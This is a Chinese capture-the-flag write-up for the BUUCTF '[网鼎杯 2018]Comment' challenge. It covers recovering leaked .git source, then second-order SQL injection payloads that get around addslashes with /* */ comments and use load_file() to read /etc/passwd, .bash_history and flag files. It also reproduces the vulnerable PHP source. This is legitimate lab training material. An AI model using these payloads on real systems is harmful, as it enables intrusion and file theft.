IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> buu-[网鼎杯 2018]Comment -> 正文阅读

[PHP知识库]buu-[网鼎杯 2018]Comment

进入题目
在这里插入图片描述
发帖时提示要登录,密码用bp跑出来是666
在这里插入图片描述
然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出
在这里插入图片描述在这里插入图片描述
稍微试了一下,有问题的都发不出留言
在这里插入图片描述
在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露
在这里插入图片描述
githack载下来的源码跟没载一样

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

在linux下的githacker里

git clone http://5b460e5f-02d2-43d6-9fc3-33ea9e95f660.node4.buuoj.cn:81/.git #获取git
git log --reflog #查看提交日志
git reset –hard e5b2a2443c2b6d395d06960123142bc91123148c  #恢复git

就可以恢复到完整的源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',  
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

输入的数据全由addslashes过滤,两个插入数据的sql语句如下

$sql = "insert into board
        set category = '$category',
            title = '$title',
            content = '$content'";
$sql = "insert into comment
        set category = '$category',  
            content = '$content',
            bo_id = '$bo_id'";

换行的结果就是插入数据库时,sql语句也是换行的形式
这就导致了我们注释时要用 /**/代替#
在这里插入图片描述
还有一点就是插入数据库时,\’插入后会变为’,不会受到影响
在这里插入图片描述
所以我们构造完的payload应该是

insert into comment
       set category = '',content=payload,/*',
           content = '*/#',
           bo_id = '$bo_id'";

利用多行注释,构造自己的payload
由于构造user()是可以看到当前用户的,就像whoami一样,
虽然不太清楚为什么大佬们的wp要构造user(),结合后面的语句感觉可以直接玩sql注入,失败后再尝试load_file()在这里插入图片描述
没有查询的源码,输入也会被原样输出,宽字节注入想不到了
在这里插入图片描述
在title处修改category没有反应,只能在category处改content,发帖时content处不能填*/#,不然会因为错误导致无法提交留言,
在这里插入图片描述在这里插入图片描述
再在提交留言处提交
在这里插入图片描述
root权限,好
‘, content=load_file(’/etc/passwd’),/*
root权限都有了,用load_file()查看下文件
在这里插入图片描述
读/flag发现没有
有一点就是历史记录会自动保存到当前目录下.bash_history文件中
',content=(select(load_file("/home/www/.bash_history"))),/*
在这里插入图片描述
cp –r复制目录
删除了/var/www/html目录下的.DS_Store,/tmp/html目录下的.DS_Store文件还在
测试了下to_base64查看时没有回显
改用hex
’ content=(select hex(load_file("/tmp/html/.DS_Store")))
有回显了
在这里插入图片描述
进制转换网站
转文本后发现flag文件
在这里插入图片描述

',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*
在这里插入图片描述
提交失败,又是假的
因为上面的cp和rm命令知道/var/www/下应该也有个flag文件
',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2021-10-18 17:08:51  更:2021-10-18 17:11:57 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 13:37:07-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计